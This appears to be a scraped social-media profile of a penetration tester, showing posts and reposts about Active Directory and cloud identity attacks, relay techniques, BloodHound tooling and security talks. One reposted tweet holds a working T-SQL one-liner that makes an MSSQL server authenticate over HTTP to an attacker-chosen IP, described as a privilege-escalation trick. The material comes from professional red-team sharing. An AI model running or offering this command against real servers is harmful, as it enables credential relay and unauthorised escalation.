Ruslan Sayfiev Profile
Ruslan Sayfiev

@cryptopeg

Followers
943
Following
10K
Media
5
Statuses
605

Penetration testing & Red Teaming

Tokyo, Japan
Joined January 2014
Don't wanna be here? Send us removal request.
@cryptopeg
Ruslan Sayfiev
10 months
本日、ザックさんが開催している「DFIR忍者チャレンジ」 #yamasec で「Active Directory攻防※よく見る脆弱性」のテーマで登壇した資料です。 @yamatosecurity 誘ってくれてありがとうございました! ※前のポスト名がよくなかったみたい、、、 https://t.co/Lxz1qVBlEB
Tweet card summary image
speakerdeck.com
長年にわたり、ペンテストやRed Teamの案件において、Active Directory環境でよく見られる脆弱性とその対策をまとめた資料です。
0
65
257
@cryptopeg
Ruslan Sayfiev
5 days
8年間、本当にありがとう、イエラエ! 小さなスタートアップから国内トップクラスのサイバーセキュリティ企業へと成長したこの道のりを、一緒に作り上げられたことが何よりの幸せでした。 私がずっと追い求めてきたのは、日本で最高のペネトレーションテスト及びRed Teamサービスを作ること。
3
28
254
@EurekaBerry
Yurika
29 days
昨日登壇した、apan Microsoft Endpoint Configuration Manager UG のActive Directory 勉強会 第 6 回目 [Active Directory セキュリティについて学ぶ回] の資料を公開しました 📝 AD保護の全部を網羅しているわけではありませんが、概要の理解のお役に立てば幸いです https://t.co/lNRPvPkP9f
Tweet card summary image
speakerdeck.com
2025 年 11 月 27 日開催 Japan Microsoft Endpoint Configuration Manager UG の Active Directory 勉強会 第 6 回目 「Active Directory セキュリティについて学ぶ回」 の講演資料です。
1
128
625
@kawakatz
Masahiro Kawada
2 months
プロトコル別にNTLMリレーとKerberosリレーの基礎的な内容についてまとめたのでぜひー! 対策についてはMitigationsをご参照いただけたら! https://t.co/NNWXDRBvou
Tweet card summary image
kawakatz.io
A technical overview of NTLM and Kerberos relay attacks
0
7
30
@EurekaBerry
Yurika
2 months
Active Directory なぜ侵入されるのかを理解し、ADの構成や設定を見直す。それだけでも、侵入のリスクを下げることができます。すべての推奨構成にできなくても、手を付けれるところからでも。 ADのベストプラクティスも更新されてますので、ぜひAD管理者の方はぜひご一読を https://t.co/Ff7zhDc6rL
Tweet card summary image
learn.microsoft.com
Active Directory をセキュリティで保護するためのベスト プラクティスについて説明します。
@syuheiuda
宇田周平
2 months
オンプレに AD が残っている皆さん、AD やられるとマジで危ないので、Defender for Identity 使ってくださいまし
5
175
856
@yamatosecurity
田中ザック (Zach Mathis)
2 months
CODE BLUEトレーニングはもうすぐ満席になりそうです!受講希望の方はお早めにご登録ください! たった2日間なのに、すでにスライドが400枚。しかも、まだ半分しか終わっていません😅 盛りだくさんの内容をどうぞお楽しみに! https://t.co/Jyye6SOtOV
Tweet card summary image
codeblue.jp
Trainingsのページです。 2025年11月18日(火)〜19日(水)に開催される世界トップクラスの専門家による日本発の情報セキュリティ国際会議「CODE BLUE」サイト。
0
6
45
@jaredcatkinson
Jared Atkinson
2 months
In this post @_wald0 introduces PingOneHound, a BloodHound OpenGraph extension that allows users to visualize, audit, and remediate attack paths in their PingOne environment. The blog post also serves as an introduction to the PingOne architecture. https://t.co/BjD5DPiih1
Tweet card summary image
specterops.io
You can use PingOneHound in conjunction with BloodHound Community Edition to discover, analyze, execute, and remediate identity-based attack paths in PingOne instances.
0
24
50
@328__
三ツ矢
2 months
レビューに関わったご縁もあり「実践Webペネトレーションテスト」を献本いただきました。 実際にWebペネのプロの方が執筆していてノウハウがたっぷり詰まっててすごく読み応えがあります。 個人的には7章の内容が大好きです。 来週発売らしいです☺️ https://t.co/c3lx3LEjas
0
4
16
@codewhisperer84
codewhisperer84
3 months
Check out Titanis, my new C#-based protocol library! It features implementations of SMB and various Windows RPC protocols along with Kerberos and NTLM. https://t.co/GC5wA2y3EO
Tweet card summary image
github.com
Windows protocol library, including SMB and RPC implementations, among others. - trustedsec/Titanis
14
185
555
@_dirkjan
Dirk-jan
3 months
I've been researching the Microsoft cloud for almost 7 years now. A few months ago that research resulted in the most impactful vulnerability I will probably ever find: a token validation flaw allowing me to get Global Admin in any Entra ID tenant. Blog:
dirkjanm.io
While preparing for my Black Hat and DEF CON talks in July of this year, I found the most impactful Entra ID vulnerability that I will probably ever find. One that could have allowed me to compromise...
141
907
3K
@TEMP43487580
%TEMP%
4 months
I just started a new blog, and this is my first post. I took a bit of PTO, so this is a little record of some fun I had playing around with Intune during that time. It's about enrollment restriction bypass😄 https://t.co/o9CcXHN4b8
Tweet card summary image
temp43487580.github.io
Ways of device ownership spoofing and more for persistent access to Intune
14
69
245
@_Mayyhem
Chris Thompson
5 months
I'm SO hyped to finally make MSSQLHound public! It's a new BloodHound collector that adds 37 new edges and 7 new nodes for MSSQL attack paths using the new OpenGraph feature for 8.0!. Let me know what you find with it! - https://t.co/Hh089SaVOS - https://t.co/geO0HXTykf
6
215
632
@0x64616e
Daniel
5 months
A colleague of mine used this today to escalate from MSSQL sysadmin to local admin on the underlying server . Much nicer than getting a potato past the EDR.
@unsigned_sh0rt
Garrett
7 months
Like this: DECLARE @o INT; EXEC sp_OACreate 'WinHttp.WinHttpRequest.5.1', @o OUT; EXEC sp_OAMethod @o, 'open', NULL, 'GET', ' http://10.6.10.20', 'false'; EXEC sp_OAMethod @o, 'SetAutoLogonPolicy', NULL, 0; EXEC sp_OAMethod @o, 'send'; EXEC sp_OADestroy @o;
0
29
158
@_dirkjan
Dirk-jan
5 months
It's been almost a year since my last blog... So, here is a new one: Extending AD CS attack surface to the cloud with Intune certificates. Also includes ESC1 over Intune (in some cases). https://t.co/Dm1x9ORW7Q Oh, and a new tool for SCEP:
dirkjanm.io
Active Directory Certificate Services (AD CS) attack surface is pretty well explored in Active Directory itself, with *checks notes* already 16 “ESC” attacks being publicly described. Hybrid certif...
8
193
530
@SpecterOps
SpecterOps
5 months
The industry recommendation for DPAPI backup key compromise remediation is to destroy and rebuild the environment. @sou_predictable explores why this is the current industry guidance.
Tweet card summary image
specterops.io
Industry guidance for DPAPI backup key compromise remediation is drastic. Let's explore why.
1
50
127
@PyroTek3
Sean Metcalf
6 months
In every Active Directory domain, there's the default domain Administrator account. * Do you know when the last time the Administrator account was used (logged into)? * The last time its password was changed? * How the password is managed and stored? * Does it have an
3
54
388
@G0ldenGunSec
Dave Cossa
6 months
Azure Arc is Microsoft's solution for managing on-premises systems in hybrid environments. My new blog covers how it can it be identified in an enterprise and misconfigurations that could allow it to be used for out-of-band execution and persistence.
Tweet card summary image
ibm.com
Explore how Azure Arc can be identified in environments, misconfigurations in deployment can allow for privilege escalation, an overprovisioned Service Principal can be used for code execution and...
7
83
190
@_xpn_
Adam Chester 🏴‍☠️
7 months
So excited to see this one come out! Awesome post from @n0pe_sled on why IdP's should still be scrutinized! (tl;dr: OneLogin leaked random customer logs with info valid to generate JWT's) 👀
Tweet card summary image
specterops.io
Critical vulnerabilities in OneLogin's AD Connector leaked authentication credentials, enabling account impersonation.
4
46
143
@hackthebox_eu
Hack The Box
7 months
To those who set the bar 🥂 Global Cyber Skills Benchmark 2025 is over, and the leaderboard has spoken. Huge congrats to the top corporate #cybersecurity teams who crushed it in this global competition: 🥇 @Synacktiv 🥈 @GMOsecurity24 🥉 https://t.co/ScP85R5ljR #HackTheBox
2
21
110